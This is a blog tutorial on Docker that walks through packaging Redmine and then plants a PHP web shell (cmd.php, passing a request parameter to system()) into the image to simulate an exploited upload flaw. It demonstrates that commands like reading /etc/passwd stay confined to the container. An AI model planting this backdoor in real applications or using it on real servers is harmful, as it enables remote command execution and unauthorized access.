
Securing Cloud-Based Applications with Docker

February 26, 2014 by Dejan Lukan

Introduction to Docker

In this article, we'll first introduce Docker and explain how it works. After setting the stage, we'll simulate a file upload vulnerability by copying a web shell into the Redmine Docker image. This is effectively the same as if an attacker had found and exploited such a vulnerability in Redmine, giving them command-line access to the server.

Docker is a virtualization container that can be used for the deployment of applications. I was recently tasked with installing the Redmine application on a server, which was quite fun. I ran into some problems along the way, and I could repeat the installation without trouble within a week, because all of the tweaks are still fresh in my mind. But what about after a month? That's an entirely different story: By then, I would probably have forgotten the details and would need to browse the Internet again. The problem is that installing applications has become quite complex, because each application requires different dependencies, which we need to install in order to run it. There's also the problem of running multiple applications on the same server, which happens all the time. We don't want to install just one application in its own virtual machine, because that wastes precious resources; on the other hand, we can't run the Apache and Nginx web servers at the same time, because they both listen on port 80. Sure, we could tweak the configuration options to overcome this limitation, but is that really the path we want to take? If we do, we'll very likely encounter the following problems [1]:

  • Isolation—If two applications have different but mutually exclusive dependencies, it's very hard for both of them to run on the same system.
  • Security—When two applications run on the same system and one contains a vulnerability that a hacker has exploited, the other applications are also affected.
  • Upgrades—When upgrading an application, the upgrade process typically overwrites the configuration files and we have no way of reverting to the old application.
  • Backups and snapshots—Normally, we can't simply back up the state of an application once everything has been set up.
  • Reproducibility—Usually, we have an automation system like Puppet, Chef, or Cfengine, which is used to automate certain tasks, such as package installation or editing of configuration files, but this process doesn't always work, which is how we end up with a broken production system that we must fix as soon as possible.
  • Constraint on resources—When one application takes up all of the system's resources, other applications stop working or become quite slow, because they don't have any resources left; normally there is no easy way to limit an application to a certain amount of RAM or CPU.
  • Ease of installation—Even when using the previously mentioned automation systems, we can't guarantee that the installation of a certain application will be correct, because the system is in an unpredictable state and a number of things can go wrong.
  • Ease of removal—We can normally install applications with the distribution's package manager, but removing them is an entirely different story. Has it ever happened to you that, after removing a package, its configuration files were left behind in the /etc/ directory?

We've already mentioned that running each application in a separate virtual machine solves all of the problems outlined above. The downside is wasted resources, since each virtual machine needs to run a whole operating system to support just one application. Wouldn't it be better if only one operating system were required for multiple applications? This is possible with Docker, which is basically a wrapper around LXC (Linux Containers). When using Docker, we can isolate file systems, users, processes, and networks for each application, which solves all of the above problems in a lightweight manner. Because Docker uses LXC, which in turn uses the host's kernel, everything executes really fast.
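Since containers share the host's kernel, a container process is just an ordinary process on the host. As a quick illustration (a hedged sketch, assuming the Ubuntu base image introduced below), we can start a long-running command in a detached container and then find that same process from the host:

[plain]

# docker run -d ubuntu sleep 300

# ps aux | grep 'sleep 300'

[/plain]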

Docker Usage

We can install Docker by using our default package manager. Installation instructions for supported operating systems can be found at [2]. After installation, running docker without any arguments prints all the commands Docker supports, as can be seen below.

[plain]
# docker
Usage: docker [OPTIONS] COMMAND [arg...]
 -H=[unix:///var/run/docker.sock]: tcp://host:port to bind/connect to or unix://path/to/socket to use

A self-sufficient runtime for Linux containers.

Commands:
    attach     Attach to a running container
    build      Build a container from a Dockerfile
    commit     Create a new image from a container's changes
    cp         Copy files/folders from the containers filesystem to the host path
    diff       Inspect changes on a container's filesystem
    events     Get real time events from the server
    export     Stream the contents of a container as a tar archive
    history    Show the history of an image
    images     List images
    import     Create a new filesystem image from the contents of a tarball
    info       Display system-wide information
    insert     Insert a file in an image
    inspect    Return low-level information on a container
    kill       Kill a running container
    load       Load an image from a tar archive
    login      Register or Login to the docker registry server
    logs       Fetch the logs of a container
    port       Lookup the public-facing port which is NAT-ed to PRIVATE_PORT
    ps         List containers
    pull       Pull an image or a repository from the docker registry server
    push       Push an image or a repository to the docker registry server
    restart    Restart a running container
    rm         Remove one or more containers
    rmi        Remove one or more images
    run        Run a command in a new container
    save       Save an image to a tar archive
    search     Search for an image in the docker index
    start      Start a stopped container
    stop       Stop a running container
    tag        Tag an image into a repository
    top        Look up the running processes of a container
    version    Show the docker version information
    wait       Block until a container stops, then print its exit code
[/plain]

Keep in mind that Docker needs to be running in daemon mode, which can be achieved by passing the -d parameter to Docker. This is done automatically by the Docker init script, so we normally don't have to do it manually.
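If the init script isn't available for some reason, the daemon can also be started by hand; a minimal sketch, assuming the 2014-era CLI in which -d ran the daemon:

[plain]

# docker -d &

[/plain]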

When we start using Docker, we must first base our work on an official image. Official images are available at https://index.docker.io. We'll base ours on the Ubuntu image, since it's the most widely used. We can download the base image simply by running the docker run command, which will fetch the Ubuntu image automatically if it hasn't been downloaded already. The argument after the image name is the command we would like to execute inside the Docker image. We're executing BASH inside the image, since we want terminal access to it. The -i parameter keeps stdin open even if not attached and -t allocates a pseudo-tty. The whole command can be seen below.

[plain]
# docker run -t -i ubuntu /bin/bash
WARNING: IPv4 forwarding is disabled.
root@adb11c65be5c:/#
[/plain]

Right after entering the image, we encounter the first sign of trouble: when running the "apt-get update" command, name resolution is not working.

[plain]
# apt-get update
Err http://archive.ubuntu.com precise InRelease
Err http://archive.ubuntu.com precise Release.gpg
Temporary failure resolving 'archive.ubuntu.com'
Reading package lists... Done
W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/precise/InRelease
W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/precise/Release.gpg
Temporary failure resolving 'archive.ubuntu.com'
W: Some index files failed to download. They have been ignored, or old ones used instead.
[/plain]

As it turns out, we have to enable IP forwarding; the warning displayed when entering the container already hinted at this. We can enable IP forwarding with the sysctl command below.

[plain]
# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
[/plain]

After reentering the Ubuntu base image, we can run "apt-get update" normally, since Docker now has access to the Internet. From now on, we can run arbitrary commands in the image, which take effect immediately. But when we exit and reenter the image, those changes will be gone: to keep them, we have to commit the changes to the repository, which creates another image. Every time we enter and exit a Docker image, a new container is created. We can list all containers by executing the "docker ps -a" command.

After entering and exiting the Ubuntu image for the first time, the following container will be present. Note that we didn't change anything in the container de1e31ec7299.

[plain]
# docker ps -a
CONTAINER ID  IMAGE         COMMAND    CREATED         STATUS  PORTS
de1e31ec7299  ubuntu:12.04  /bin/bash  30 seconds ago  Exit 0
[/plain]

But we want to have the dig command available in the image, so we can run DNS queries. For that, we have to reenter the Ubuntu container and install dnsutils, which contains quite a few DNS programs, including dig. After running "apt-get install dnsutils", the dig command is available and we can run it normally. If we exit the Ubuntu image and run "docker ps -a" again, we can observe an additional container with the ID 9030c1635eb8.

[plain]
# docker ps -a
CONTAINER ID  IMAGE         COMMAND    CREATED        STATUS  PORTS
9030c1635eb8  ubuntu:12.04  /bin/bash  3 minutes ago  Exit 0
de1e31ec7299  ubuntu:12.04  /bin/bash  4 minutes ago  Exit 0
[/plain]

If we reenter the Ubuntu image now, the dig command won't be available, because we haven't entered the container with the ID 9030c1635eb8. In order to continue working from the container 9030c1635eb8, we have to commit it to the repository. The repository name follows the GitHub naming convention and takes the form username/imagename: the username is our Docker username and imagename is the name of the image.

[plain]
# docker commit 9030c1635eb8 proteansec/ubuntu
62bd59ac78205d9dad7c52365d443c339a89e6cab13b4c33024881750ed052f8
[/plain]

After that, we can enter the new image with the same "docker run" command, except passing it the proteansec/ubuntu image name instead of just ubuntu, as shown below.
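[plain]

# docker run -t -i proteansec/ubuntu /bin/bash

[/plain]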

Up until now we have presented a few basics of using Docker and in the next part we'll be installing the Redmine application, which we'll later try to exploit.

Docker and Redmine

If we go to https://index.docker.io/ and search for "redmine," results from prior work on packaging Redmine for Docker will be displayed. Various images are already available from various contributors: some are built on Ubuntu, CentOS, or Turnkey Redmine, while others are built from source. The most popular version appears to be sameersbn/redmine, which we'll be using in this article. There are multiple ways of downloading and installing the image:

  • Docker Index—We can install the image by simply pulling it from the Docker index, by running "docker pull sameersbn/redmine".
  • Dockerfile—To build the image from its Dockerfile, we copy the contents into a file named Dockerfile and then run "docker build -t myusername/redmine .".
  • Manual—We can also look at the Dockerfile and run the commands manually inside a new container, after which we can commit the container.

We've seen that containers can be built manually by running commands or automatically by using Dockerfiles. A Dockerfile is a file that contains various directives used to build images automatically. The available Dockerfile directives are the following (a minimal example Dockerfile follows the list):

  • FROM defines the base image the automation process will build upon and must be the first directive in a Dockerfile.
  • MAINTAINER names the author of the Dockerfile.
  • RUN is the execution directive, which takes a command and executes it when building the image.
  • ADD copies files from the host machine into the container.
  • EXPOSE exposes a container port to the host machine to enable network communication with the application installed in the container.
  • ENTRYPOINT specifies the default application that is run when the container is started.
  • CMD is similar to the RUN directive, except that CMD commands are executed not when building the image, but when the container is run.
  • ENV sets environment variables, which can be accessed by scripts and applications in the container.
  • USER sets the user that is used to run the container.
  • VOLUME enables access from the container to the host machine by mounting a volume.
  • WORKDIR defines the working directory from which the CMD commands will be run.
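To tie these directives together, here's a minimal illustrative Dockerfile (a sketch only; the package, file, and script names are invented for the example and don't come from any real image):

[plain]

FROM ubuntu:12.04
MAINTAINER John Doe <john@example.com>
ENV APP_HOME /app
RUN apt-get update && apt-get -y install curl
ADD start.sh /app/start.sh
WORKDIR /app
EXPOSE 80
ENTRYPOINT ["/app/start.sh"]
CMD ["app:start"]

[/plain]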

Take a look at the Redmine Dockerfile available at [3]; it is very simple and does the following:

  • Bases the image off ubuntu:12.04.
  • Installs various packages with apt-get install and corrects the sources.list.
  • Downloads Ruby 1.9.3 and installs it onto the system.
  • Installs the passenger gem and the passenger Apache module.
  • Copies the resources/ directory from the host machine to the /redmine/ directory in the image.
  • Fixes permissions for scripts inside the /redmine directory and runs the /redmine/setup/install script, which configures Apache, installs Redmine into the /redmine/ directory, installs the required gems, configures Redmine themes and plug-ins, fixes permissions, and configures supervisord.
  • Copies the authorized_keys file from the host machine to the /root/.ssh/ directory.
  • Moves the .vimrc and .bash_aliases files to the /root/ directory.
  • Fixes permissions for the /root/.ssh directory and the authorized_keys file.
  • Exposes port 80.
  • Defines the script /redmine/redmine as an entrypoint and passes it "app:start" when executing the container. This script defines environment variables used by the image, starts MySQL, populates the Redmine database in MySQL if it's empty, fixes certain permissions, configures mail delivery for Redmine, and starts Redmine.

With Docker, we can pass an arbitrary number of environment variables to the container by passing the -e option to "docker run."

[plain]
# docker run -h
 -e=[]: Set environment variables
[/plain]

Let's create a simple test that shows how to pass an environment variable, CUSTOMENV:

[plain]
# docker run -i -t -e CUSTOMENV=CUSTOMVALUE sameersbn/redmine env
APACHE_PID_FILE=/var/run/apache2.pid
HOSTNAME=05218ae2337f
APACHE_RUN_USER=www-data
TERM=xterm
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/redmine
APACHE_RUN_GROUP=www-data
CUSTOMENV=CUSTOMVALUE
SHLVL=1
HOME=/
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/run/lock/apache2
container=lxc
_=/usr/bin/env
OLDPWD=/
[/plain]

Notice that the custom environment variable CUSTOMENV has been set. Most of the time, we pass environment variables to Docker because we would like to tune certain things, such as configuration files. The Redmine Docker image is capable of tuning MySQL, SMTP, and Passenger settings, and it does so in a rather hackish way. After installing the sameersbn/redmine container, config/database.yml contains a template in which each {{VAR}} placeholder still needs to be replaced by an actual value, which is done at runtime (and not during installation).
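The article originally displayed the templated file at this point; a hedged sketch of what such a {{VAR}}-style template looks like (the exact keys and placeholder names in sameersbn/redmine may differ):

[plain]

production:
  adapter: mysql2
  database: {{DB_NAME}}
  host: {{DB_HOST}}
  port: {{DB_PORT}}
  username: {{DB_USER}}
  password: {{DB_PASS}}

[/plain]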

When executing the container, default values for these variables are set in the ENTRYPOINT script, along the lines of the sketch below (the actual variable names and default values in the script may differ):
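[plain]

DB_HOST=${DB_HOST:-localhost}
DB_PORT=${DB_PORT:-3306}
DB_NAME=${DB_NAME:-redmine_production}
DB_USER=${DB_USER:-redmine}
DB_PASS=${DB_PASS:-password}

[/plain]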

Before the script actually runs Redmine, it also substitutes the configuration values with sed, as sketched after this paragraph. By doing that, we can run Redmine with custom settings and connect to an external MySQL database if we want. When the Docker container stops, the values in database.yml are not preserved, because we're not doing a commit, which is why we can change those settings every time we run the container.
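A hedged sketch of that substitution step (the file path follows the image layout described above; the variable names are assumed):

[plain]

sed -i "s/{{DB_HOST}}/${DB_HOST}/g" /redmine/config/database.yml
sed -i "s/{{DB_PORT}}/${DB_PORT}/g" /redmine/config/database.yml
sed -i "s/{{DB_NAME}}/${DB_NAME}/g" /redmine/config/database.yml

[/plain]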

The basic idea is to change the tunable variables in a container at runtime, and there are various ways of doing that. We need some kind of wrapper that changes the configuration options and then starts the application.

Let's now enter the Docker container by running the "docker run -t -i sameersbn/redmine /bin/bash" command. After getting a BASH shell, we can list the applications listening on network ports, which are apache, sshd, and mysqld.

[plain]
# netstat -luntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address   Foreign Address  State   PID/Program name
tcp   0      0      0.0.0.0:80      0.0.0.0:*        LISTEN  16/apache2
tcp   0      0      0.0.0.0:22      0.0.0.0:*        LISTEN  15/sshd
tcp   0      0      127.0.0.1:3306  0.0.0.0:*        LISTEN  377/mysqld
tcp6  0      0      :::22           :::*             LISTEN  15/sshd
[/plain]

Only a limited number of processes are running, because Docker uses the host's kernel and doesn't need to start a whole operating system for one application.

[plain]
# ps aux
USER     PID %CPU %MEM    VSZ   RSS TTY STAT START TIME COMMAND
root       1  0.0  0.1  17880  1596 ?   S    15:29 0:00 /bin/bash /redmine/redmine /bin/bash
root       9  0.0  1.1  59668 11684 ?   Ss   15:29 0:00 /usr/bin/python /usr/bin/supervisord
root      14  0.0  0.1  19104  1032 ?   S    15:29 0:00 /usr/sbin/cron -f
root      15  0.0  0.2  49948  2868 ?   S    15:29 0:00 /usr/sbin/sshd -D
root      16  0.0  0.4  80980  4816 ?   S    15:29 0:00 /usr/sbin/apache2 -DFOREGROUND
root      17  0.0  0.0   4392   748 ?   S    15:29 0:00 /bin/sh /usr/bin/mysqld_safe
root     351  0.0  0.1 220920  2052 ?   Ssl  15:29 0:00 PassengerWatchdog
root     354  0.0  0.2 295300  2272 ?   Sl   15:29 0:00 PassengerHelperAgent
root     356  0.0  0.8 109304  9108 ?   Sl   15:29 0:00 Passenger spawn server
nobody   359  0.0  0.4 169316  4700 ?   Sl   15:29 0:00 PassengerLoggingAgent
www-data 367  0.0  0.2  81004  2428 ?   S    15:29 0:00 /usr/sbin/apache2 -DFOREGROUND
www-data 368  0.0  0.2  81004  2428 ?   S    15:29 0:00 /usr/sbin/apache2 -DFOREGROUND
www-data 369  0.0  0.2  81004  2428 ?   S    15:29 0:00 /usr/sbin/apache2 -DFOREGROUND
www-data 370  0.0  0.2  81004  2428 ?   S    15:29 0:00 /usr/sbin/apache2 -DFOREGROUND
www-data 371  0.0  0.2  81004  2428 ?   S    15:29 0:00 /usr/sbin/apache2 -DFOREGROUND
mysql    377  0.0  4.0 492432 41580 ?   Sl   15:29 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file
root     378  0.0  0.0   4296   636 ?   S    15:29 0:00 logger -t mysqld -p daemon.error
root     438  0.0  0.1  18044  1960 ?   S    15:30 0:00 /bin/bash
root     447  0.0  0.1  15272  1144 ?   R+   15:32 0:00 ps aux
[/plain]

To bind port 80 (Apache) in the container to port 8888 on the host machine, we have to run the following command.

[plain]
# docker run -d -p 8888:80 sameersbn/redmine

# netstat -luntp
tcp6 0 0 :::8888 :::* LISTEN 5454/docker
[/plain]

We can see that the host machine is listening on port 8888; connections to it are redirected to port 80 in the Docker container, where Apache is listening and serving the Redmine application. If we connect to port 8888 now, we'll actually connect to Redmine running inside the Docker container.
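As a quick sanity check (a hedged example; the IP address is the test host used later in the article, and the output is omitted), we could request the page from another machine:

[plain]

# curl -I http://192.168.1.2:8888/

[/plain]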

Uploading the Shell

Here we'll copy a shell into the Docker image to simulate a file upload vulnerability that an attacker has successfully exploited. First we have to set up an environment where we can execute scripts CGI-style. Since the Redmine Docker container uses the Apache web server, we'll add libapache2-mod-php5 to the container, so we can deploy a PHP web shell.

The best way to add files and install packages into an image is to create a new Dockerfile that bases off the sameersbn/redmine parent image. Let's go through all the steps we have to follow to actually deploy the web shell.

First we have to pull an existing Docker image from the Internet by using the "docker pull" command.

[plain]
# docker pull sameersbn/redmine
[/plain]

Then we have to create another directory and create a Dockerfile in it with the following contents.

[plain]
FROM sameersbn/redmine
RUN apt-get -y install libapache2-mod-php5
ADD redmine.conf /etc/apache2/conf.d/redmine.conf
ADD phpinfo.php /redmine/public/phpinfo.php
ADD cmd.php /redmine/public/cmd.php
[/plain]

The first line tells Docker that we're basing our image on sameersbn/redmine. Then we install libapache2-mod-php5 into the image by using the RUN Docker directive. After that, we add three files to the Docker image: redmine.conf, phpinfo.php, and cmd.php. Our redmine.conf replaces the existing one, because we want to add PHP support to Apache; it looks like this:

[plain]
<VirtualHost *:80>
    RailsEnv production
    DocumentRoot /redmine/public
    CustomLog /var/log/apache2/access.log common
    ErrorLog /var/log/apache2/error.log

    <Directory /redmine/public>
        AllowOverride all
        Options -MultiViews
    </Directory>

    Alias /cgi /redmine/cgi
    <Directory /redmine/cgi>
        AddHandler php5-script .php
        AddType text/html .php
    </Directory>
</VirtualHost>
[/plain]

We also need to create the phpinfo.php script, a PHP script that displays information about the PHP environment.

[plain]
<?php
phpinfo();
?>
[/plain]

The cmd.php is the webshell backdoor that we want to deploy to the container; it can be copied from the Kali Linux distribution. For completeness, it's presented below:

[plain]
<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
?>
[/plain]

After that we actually need to create the new image proteansec/redmine by using the command below (we need to be in the directory where the Dockerfile is located).

[plain]
# docker build -t proteansec/redmine .
[/plain]

Then we can start a new container from the newly built image by using the command below, which starts the new Redmine image and redirects the host's port 8888 to the container's port 80.

[plain]
# docker run -d -p 8888:80 proteansec/redmine
[/plain]

After waiting a few minutes for everything to start, Redmine is accessible at http://192.168.1.2:8888/, as we've already seen. In addition, the phpinfo.php script is executable and prints information about the installed PHP environment.

That proves PHP is working, so our webshell should also work. Let's try to execute the ls command by passing it in the cmd GET parameter: the webshell works as expected, and we've successfully gained access to the system (just as a malicious hacker could after exploiting a vulnerability).
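Invoking the shell works from a browser or from the command line; a minimal sketch using curl against the host and port from our setup (same cmd GET parameter as above):

[plain]

# curl "http://192.168.1.2:8888/cmd.php?cmd=ls"

[/plain]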

We can execute the "cat /etc/passwd" command to print the contents of the /etc/passwd file. The great thing about using Docker is that we're restricted to the Redmine Docker application: we're actually printing the /etc/passwd file of the Docker container, not of the host system. Therefore, the attacker has access only to the application and its required components, not to the other applications or the host operating system, which greatly increases overall security.

Conclusion

We've seen that Docker is a very nice project that we can use for many things. At the beginning of the article, we mentioned that it solves many problems, such as isolation, security, upgrades, etc. We've also mentioned the benefits of Docker over Puppet, Chef, and Cfengine, although those products are actually quite similar. Puppet, Chef, and Cfengine work on the host operating system itself, trying to install all dependencies and configure the application, which is also what Docker does, but with one big difference: Docker uses its own container for each application it deploys, while Puppet, Chef, and Cfengine do not. Therefore, Docker executes practically the same scripts in a controlled environment, where the result of each action is known in advance, while Puppet, Chef, and Cfengine operate in an unpredictable environment.

Docker is still a very young project, so not all applications have been ported to it, while others are available but not customizable enough; when installing an application, we want to be in control of it. If we would like it to use a database on an externally accessible host, we should be able to do that. While Docker images are still in the early development phase, they will probably become fully customizable in a short time.

We've also added a PHP webshell to the Docker image and tried to print the /etc/passwd file, which was successful, but it was the /etc/passwd of the Docker image rather than of the host. Therefore, a hacker who successfully exploits a vulnerability in an application is restricted to the Docker application environment, rather than being able to access the host's filesystem. This greatly improves the security of the application and the operating system, because it confines the hacker to a sandbox, which they must bypass to reach the host. It's another layer of security that must be bypassed by malicious hackers in order to gain access to the host operating system.

References:

[1] Docker: Using Linux Containers to Support Portable Application Deployment:
http://www.infoq.com/articles/docker-containers/.

[2] Installation:
http://docs.docker.io/en/latest/installation/.


[3] Docker Redmine (sameersbn/redmine):
https://index.docker.io/u/sameersbn/redmine/.